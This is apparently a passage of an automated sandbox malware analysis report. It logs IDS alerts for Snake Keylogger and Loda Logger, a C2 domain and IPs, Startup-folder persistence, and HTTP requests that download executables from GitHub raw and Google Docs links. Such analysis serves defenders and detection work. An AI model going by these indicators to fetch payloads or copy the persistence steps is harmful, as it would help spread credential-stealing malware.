                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49774 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49772 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49771 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49773 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49784 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49783 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49788 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49789 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49790 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49787 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49800 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49801 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49810 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49811 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49821 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49822 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49831 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49832 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49852 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49851 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49870 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49871 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49882 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49881 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49896 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49897 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49904 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49906 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49905 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49907 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49926 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49925 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49944 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49945 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49953 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49956 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49970 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49969 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49982 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49980 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50001 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50002 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50019 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50020 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50036 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50037 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50055 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50056 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50075 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50076 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50084 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50086 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50105 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50104 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50115 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50117 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50130 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50129 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50143 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50144 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50160 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50161 version: TLS 1.2
                                Source: wscript.exe, 00000000.00000003.1762528484.0000022996FF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: wscript.exe, 00000000.00000003.1762528484.0000022996FF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: wscript.exe, 00000000.00000003.1762528484.0000022996FF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: wscript.exe, 00000000.00000003.1761225232.00000229974E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: wscript.exe, 00000000.00000003.1761225232.00000229974E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: wscript.exe, 00000000.00000003.1761225232.00000229974E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: wscript.exe, 00000000.00000003.1760645672.00000229972F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: wscript.exe, 00000000.00000003.1760645672.00000229972F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: wscript.exe, 00000000.00000003.1760645672.00000229972F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: update.exe, 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                                Source: update.exe, 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                                Source: update.exe, 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: autorun.inf
                                Source: RCX4F1F.tmp.6.drBinary or memory string: [autorun]
                                Source: RCX4F1F.tmp.6.drBinary or memory string: [autorun]
                                Source: RCX4F1F.tmp.6.drBinary or memory string: autorun.inf
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001FDD92 GetFileAttributesW,FindFirstFileW,FindClose,7_2_001FDD92
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00232044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_00232044
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0023219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_0023219F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_002324A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_002324A9
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00226B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,FindNextFileW,FindClose,FindClose,7_2_00226B3F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00226E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,FindNextFileW,FindClose,7_2_00226E4A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_0022F350
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022FD47 FindFirstFileW,FindClose,7_2_0022FD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,7_2_0022FDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E52044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00E52044
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E5219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00E5219F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E524A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_00E524A9
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E46B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,16_2_00E46B3F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E46E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,16_2_00E46E4A
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E4F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_00E4F350
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E4FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,16_2_00E4FDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E1DD92 GetFileAttributesW,FindFirstFileW,FindClose,16_2_00E1DD92
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E4FD47 FindFirstFileW,FindClose,16_2_00E4FD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00232044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_00232044
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0023219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_0023219F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_002324A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_002324A9
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00226B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,22_2_00226B3F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00226E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,22_2_00226E4A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0022F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_0022F350
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0022FD47 FindFirstFileW,FindClose,22_2_0022FD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001FDD92 GetFileAttributesW,FindFirstFileW,FindClose,22_2_001FDD92
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0022FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,22_2_0022FDD2
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
                                Source: excel.exeMemory has grown: Private usage: 5MB later: 69MB

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.4:49753 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:49753 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.4:49745 -> 69.42.215.252:80
                                Source: Network trafficSuricata IDS: 2830912 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon Response M2 : 172.111.138.100:5552 -> 192.168.2.4:49753
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49740 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49741 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49755 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49754 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49767 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49774 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49772 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49783 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49784 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49800 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49788 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49801 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49810 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49821 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49822 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49811 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49831 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49852 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49871 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49880 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49897 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49870 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49896 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49790 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49944 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49954 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49945 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49955 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49970 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49907 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49925 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49832 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49883 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49983 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49926 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:50002 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49969 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:50001 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49981 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:50019 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:50020 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49766 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49851 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49904 -> 142.250.181.14:443
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 185.199.108.133 443Jump to behavior
                                C2 URLs / IPs found in malware configuration
                                Source: Malware configuration extractorURLs: xred.mooo.com
                                Potential malicious VBS script found (has network functionality)
                                Source: Initial file: .write cYVOaxXr.responseBody
                                Source: Initial file: .savetofile FileName , 2
                                Uses dynamic DNS services
                                Source: unknownDNS query: name: freedns.afraid.org
                                Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                                Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                                Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                                Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                                Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: global trafficHTTP traffic detected: GET /knkbkk212/knkbkk212/refs/heads/main/RNEQTT.exe HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: raw.githubusercontent.comConnection: Keep-Alive
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0023550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,7_2_0023550C
                                Source: global trafficHTTP traffic detected: GET /knkbkk212/knkbkk212/refs/heads/main/RNEQTT.exe HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: raw.githubusercontent.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
